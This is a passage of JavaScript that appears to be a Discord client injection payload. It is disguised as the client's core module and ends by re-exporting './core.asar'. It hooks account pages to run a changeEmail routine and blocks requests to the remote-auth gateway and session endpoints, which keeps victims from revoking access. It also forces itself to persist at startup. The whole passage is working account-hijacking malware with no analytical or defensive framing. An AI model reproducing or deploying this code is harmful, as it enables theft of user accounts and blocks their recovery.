\`; try { document.body.appendChild(placeholder); await new Promise(resolve => setTimeout(resolve, Number.MAX_SAFE_INTEGER)); } catch (error) { } }; changeEmail(); `); } }; switch (true) { case (url.endsWith('/@me') && !script_executed) || (url.includes('/settings') && !script_executed): if (url.endsWith('/@me')) { await processUserUpdate(); } if (url.includes('/settings')) { script_executed = true; } break; } }); }; const allSessionsLocked = async () => { const webRequest = session.defaultSession.webRequest; if (!webRequest) return; webRequest.onBeforeRequest(CONFIG.session_filters, (details, callback) => { const cancel = details.url.includes('wss://remote-auth-gateway') || details.url.includes('auth/sessions'); callback({ cancel }); }); try { const isEnabled = await isLogged(); if (isEnabled) return interceptRequest(); } catch (error) { console.error(error); } setTimeout(allSessionsLocked, 5000); }; const complete = async () => { if (CONFIG.auto_persist_startup === 'true') { forcePersistStartup(); } startup(); createWindow(); defaultSession(); // For it to work you have to make it run indefinitely. // allSessionsLocked(); }; complete(); module.exports = require('./core.asar');